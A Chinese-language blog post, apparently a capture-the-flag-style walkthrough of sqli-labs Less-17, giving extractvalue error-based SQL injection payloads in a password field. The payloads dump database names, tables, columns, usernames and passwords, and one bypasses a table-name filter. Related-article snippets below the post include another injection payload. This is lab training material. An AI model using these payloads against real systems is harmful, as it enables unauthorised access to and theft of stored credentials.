sqli-labs-less-17 extractvalue报错注入

最新推荐文章于 2023-07-10 14:26:45 发布
最新推荐文章于 2023-07-10 14:26:45 发布
阅读量278 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/109680290
版权

Less-17 extractvalue报错注入

找寻注入点:

首先用burp suite抓包,得到post信息后,用hackbar进行测试
经过测试发现,无论怎样对uname进行测试,都显示失败,猜测是对uname进行了过滤,我们考虑从password进行注入:

该关卡是对密码进行更改,如果用户名正确,则修改密码为新密码,如果用户名错误,则返回失败,

因此该关卡需先知道一个用户名admin

Sql知识:

extractvalue(xml_frag,xpath_expr)使用xpath表示法从xml字符串中提取值,利用concat()参数将要获取的数据库内容拼接到xpath_expr中,由于数据库内容肯定不符合xpath路径语法,因此会报错,一并将查询的数据库内容带出。

查询当前数据库:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select(database())))) #&submit=Submit
在这里插入图片描述

查询所有数据库:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select group_concat(schema_name) from information_schema.schemata))) #&submit=Submit
在这里插入图片描述

使用group_concat时,输出对长度有限制,我们可以使用limit逐个输出:
uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select schema_name from information_schema.schemata limit 1,1))) #&submit=Submit

查询security库中的表:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1))) #&submit=Submit
在这里插入图片描述

查询users表中的字段:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 1,1))) #&submit=Submit
在这里插入图片描述

查询username字段中的信息:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select username from users limit 1,1))) #&submit=Submit
这里显示不允许查询,因为后台做了限制,我们通过嵌套查询和改名,绕过users表名的限制:
uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select username from (select username from users)a limit 1,1))) #&submit=Submit
在这里插入图片描述

查询password也是这样:

uname=admin &passwd=1’ and extractvalue(1,concat(’~’,(select password from (select password from users)a limit 5,1))) #&submit=Submit

未完待续。。。。

yzcn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-sqli-labs第17
weixin_46784800的博客
11-10 1575
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
sqli-labs靶场实现(七)【post update语句注入】(less-17、具体步骤+图文详解)
weixin_46709219的博客
12-30 694
一)post update语句注入   1)mysql update介绍   2)过滤内容介绍   3)mysql update注入   4)sqlmap安全措施 —————————————————————————————————————————————————— 一)post update语句注入 1)mysql update介绍 2)过滤内容介绍 3)mysql update注入 4)sqlmap安全措施 ...
Sqli-labs——lesson17报错注入
weixin_62281892的博客
07-06 203
lesson17
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1085
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
sql注入-报错注入1】extractvalue()函数 报错注入
07-10 3136
报错注入extractvalue()函数的使用
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
最新发布
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL注入-extractvalue报错注入
weixin_52613207的博客
06-11 480
出现报错注入的原因:报错注入是一种页面的响应形式,用户在前台页面输入检索内容,后台将前台页面上输入的检索内容无加区别地拼接成sql语句,送给数据库执行,数据库将执行结果返回给后台,后台将数据结果无加区别地显示到前台的页面上,简而言之就是后台对于输入输出的合理性没有检查。什么是报错注入:构造语句,让错误信息中夹杂可以显示数据库内容的查询语句什么时候使用报错注入:查询无回显位的时候,使用报错注入(如图)
extractvalue报错注入
bangyan3903的博客
08-18 3518
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
知识总结 | 注入写webshell
IerkeU的博客
03-25 3514
一、什么是webshell? ​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。 ​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。 一句话木马 ​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此 简
sqli-labs Less-5(利用extractvalue进行报错注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-30 1261
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) 作者水平有限,如发现错误请指出。 1、通过观察发现,不管id等于几均显示You are in…。猜测无回显 可使用联合注入验证猜测 利用order by 判断出有3个字段 2、加单引号发现为字符型注入,发现页面有错误回显 3、尝试使用extractva
继续熟悉burpSuite及pikachu注入漏洞演示2
weixin_44722125的博客
03-31 384
union 注入 只有知道正确的字段数才能去拼接union 如何去猜对应查询的字段数:在sql中用order by 进行猜测 order by 1 查询结果按照第一列进行排序 order by 2 查询结果按照第二列进行排序 在实际的猜测中可以用二分法进行测试 用5试一下 报错 用3试一下 也不对 用2试一下 对了 证实主查询里只有2个字段 接下来用union去做拼接 xx’unio...
【问题解决】Sql-li-labs报错Error:Call to undefined function mysql_connect(),以及没有sql语句错误提示的解决
share something here
04-12 7316
搭建Sql-li-labs问题处理问题一问题二 问题一 因为小皮面板phpstudy默认安装的是7.x版本的php,高版本的php已经不再支持sql-li-labs其中一些命令,故为了兼容sql-li-labs,我们要采用低版本的php。 在软件管理,找到低版本的phpstudy,安装5.x版本的php 进入到网站管理界面,选择低版本php,之后访问sql-li-labs访问。 问题二 root用户数据库密码连接不上 在小皮面板数据库处的密码要和db-creds.inc文件内的密码一样。 ...
关于在sqli-labs1~20中使用的注入方式原理
weixin_43733035的博客
01-21 447
一. 1. 排序:order by 基于sql语法的排序,根据by后面的数字来进行升序排序,或者通过使用desc来进行降序 排序。 2. 联合注入:union select 1,2,3 - - + 这里是基于sql语句,当通过order by已经测试出来有多少组数据之后,可以先使用union select 来查询有多少显示位,然后,通过将相应位的数字改为查询语句就可以在相应的显示位显示出...
c++中的constexpr与inline
追求卓越583的博客
10-25 2729
inline是修饰内联函数的,从而提高程序调用简单函数的速度,在编译器编译的时候就可以替换对应的编译表达式 需要注意的是,inline函数中不能包含if,swatch等分支语句,也不能进行异常接口声明 inline 函数避免函数调用的开销 将函数指定为 inline 函数, (通常)就是将它在程序中每个调用点上“内联地”展开。假设我们将 shorterString 定义为..
floor报错注入的两种格式
aitong的博客
01-31 454
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs:less-2(数字型报错注入
羽的博客
07-12 215
贴上源代码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值